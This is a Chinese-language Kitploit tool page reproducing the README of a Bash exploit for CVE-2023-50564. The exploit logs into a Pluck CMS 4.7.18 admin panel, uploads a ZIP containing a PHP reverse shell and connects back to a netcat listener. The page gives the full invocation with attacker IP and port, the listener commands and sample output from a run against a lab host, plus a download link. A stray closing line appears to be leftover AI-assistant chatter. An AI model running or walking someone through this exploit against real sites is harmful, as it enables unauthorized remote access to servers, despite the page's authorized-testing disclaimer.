Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564 — Bash 漏洞利用,通过恶意 ZIP 上传自动化 Pluck CMS 4.7.18 中的认证远程代码执行,触发 PHP 反向 Shell,针对 CVE-2023-50564。 | Kitploit
工具/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Payload生成漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Bash 漏洞利用,通过恶意 ZIP 上传自动化 Pluck CMS 4.7.18 中的认证远程代码执行,触发 PHP 反向 Shell,针对 CVE-2023-50564。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
131年前尚未审核

CVE-2023-50564 - Pluck CMS v4.7.18 远程代码执行漏洞利用

描述

该脚本利用了 Pluck CMS v4.7.18 中的远程代码执行漏洞。该漏洞允许恶意用户上传恶意 PHP 文件到服务器并执行,从而在目标机器上获得远程命令执行权限。

脚本自动完成整个过程:

  1. 使用提供的凭据登录 Pluck CMS 管理面板。
  2. 上传包含恶意反向 Shell PHP 脚本的 ZIP 文件。
  3. 执行 PHP 反向 Shell,使攻击者获得对目标机器的远程访问。

注意: 脚本需要在攻击者机器上设置 Netcat 监听器以接收反向 Shell。


先决条件

在运行脚本之前,请确保:

  • 已安装 Netcat 并设置监听器以接收反向 Shell。
  • 已掌握正确的目标 主机、密码、IP 地址 和 端口 以用于反向 Shell。
  • 可以访问目标上的 Pluck CMS 管理面板。

使用方法

root@kitploit:~
./CVE-2023-50564 -h <主机> -P <密码> -i <IP> -p <端口>

参数:

  • -h <主机>:目标主机(例如 greenhorn.htb)。
  • -P <密码>:Pluck CMS 管理面板的密码(例如 abcd123)。
  • -i <IP>:攻击者接收反向 Shell 的 IP 地址。
  • -p <端口>:Netcat 监听器运行的端口,用于捕获反向 Shell。

示例:

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001

步骤:

  1. 设置 Netcat 监听器:在攻击者机器上,在指定端口启动 Netcat 监听器:

    root@kitploit:~
    nc -nvlp <端口>
    

    例如:

    root@kitploit:~
    nc -nvlp 9001
    
  2. 运行脚本:向脚本提供所需参数,包括主机、密码、IP 地址和端口。

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    
  3. 脚本执行:

    • 脚本登录 Pluck CMS 管理面板。
    • 上传包含反向 Shell PHP 脚本(love.php)的 ZIP 文件。
    • 上传 ZIP 文件后,反向 Shell 在目标上执行,并连接到你的 Netcat 监听器。
    • 显示一条干净的消息:"RCE 在等待你,请前去查看。",脚本在记录所用时间后终止。
  4. 访问目标:一旦触发了反向 Shell,连接将出现在你的 Netcat 监听器中,使你获得对目标机器的远程访问。


POC

image

输出示例

root@kitploit:~
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
检测到端口 9001 上的 Netcat 监听器。
正在下载反向 Shell PHP 利用程序...
   正在更新: love.php (压缩 60%)
利用程序已压缩为 loverce.zip,原始 PHP 文件已删除。
提取 Cookie: PHPSESSID=somecookievalue
登录成功!
ZIP 文件上传成功。
RCE 在等待你,请前去查看。
脚本终止。总耗时:70 秒。

依赖

  • cURL:用于与 Pluck CMS 交互并上传文件。
  • Netcat:用于监听反向 Shell。

如果尚未安装 curl 和 netcat,可以使用以下命令安装:

Debian/Ubuntu:

root@kitploit:~
sudo apt update
sudo apt install curl netcat

Red Hat/CentOS/Fedora:

root@kitploit:~
sudo yum install curl nc

免责声明

此脚本仅用于教育和授权的渗透测试。未经授权使用此脚本是非法且不道德的。在利用任何系统漏洞之前,请务必获得适当的授权。


故障排除

  1. 504 网关超时:脚本在尝试执行反向 Shell 时可能会遇到此错误,但这不会影响 Shell 执行的成功。该错误通常是由于目标服务器响应 HTTP 请求花费时间过长,但 Shell 仍应正常工作。

  2. Netcat 监听器问题:如果未收到反向 Shell,请确保 IP 地址和端口设置正确,并且没有防火墙限制阻止目标回连到你的机器。

  3. 脚本登录失败:如果登录 CMS 管理面板失败,请验证提供的密码是否正确,并确保目标机器上的 CMS 可访问。


如果你需要任何进一步的自定义或对 README 有澄清需求,请告诉我!

下载工具